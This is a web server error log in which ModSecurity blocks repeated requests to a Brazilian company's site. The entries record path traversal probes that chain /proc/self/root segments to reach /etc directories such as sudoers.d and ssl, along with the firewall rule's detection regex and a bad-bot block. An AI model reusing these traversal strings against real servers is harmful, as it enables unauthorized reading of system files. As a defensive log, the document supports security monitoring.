[Mon Mar 16 16:38:39.347273 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:40374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcP6TCbgAP5jq5Teg_mgAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:38:41.520306 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:49394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcQNSswJuvopo3lOhx4QAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:38:53.453038 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:52416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcTY6lpbStxTqkSkt9qQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:39:00.163869 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:38828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcVP9ocpUE4ed4uDwFdAAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:39:00.230544 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:49404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcVI6lpbStxTqkSkt9rwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:39:01.478726 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.241.46:53480] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcVdSswJuvopo3lOhx5QAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:02.640112 2026] [access_compat:error] [pid 29507:tid 140411616036608] [client 136.117.173.182:55024] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 16:39:03.835544 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.243.203:51064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcV6QpVkWug9HeOt9InQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:39:08.304425 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:51068] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcXNSswJuvopo3lOhx7wAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:16.294129 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.241.46:53486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcZM_BxrYCr4hPDw_9hAAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:39:18.992070 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:33810] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcZqTCbgAP5jq5Teg_nwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:28.670598 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.243.203:51084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhccEr9dMAiw-8KANNZVwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:39:31.163385 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:39706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcc_9ocpUE4ed4uDwFegAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:32.434460 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:38984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcdFajLEzk2WiQ-10mNAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:34.744434 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:38994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcdo6lpbStxTqkSkt9tAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:36.066763 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:38996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhceLABkC4fWIHEf8EGJgAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:43.338462 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.244.31:40138] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhcf46lpbStxTqkSkt9tgAAAkc"]
[Mon Mar 16 16:39:45.096811 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.243.203:39004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcgc_BxrYCr4hPDw_9jwAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:47.419135 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:41518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcg_9ocpUE4ed4uDwFhgAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:48.709943 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.243.203:41530] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhchKQpVkWug9HeOt9IrgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:39:53.523916 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:41536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcibABkC4fWIHEf8EGKgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:39:58.602775 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.243.203:59286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcjVajLEzk2WiQ-10mQwAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:39:59.921857 2026] [:error] [pid 15568:tid 140411574073088] [client 74.7.243.203:59300] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcj6QpVkWug9HeOt9IswAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
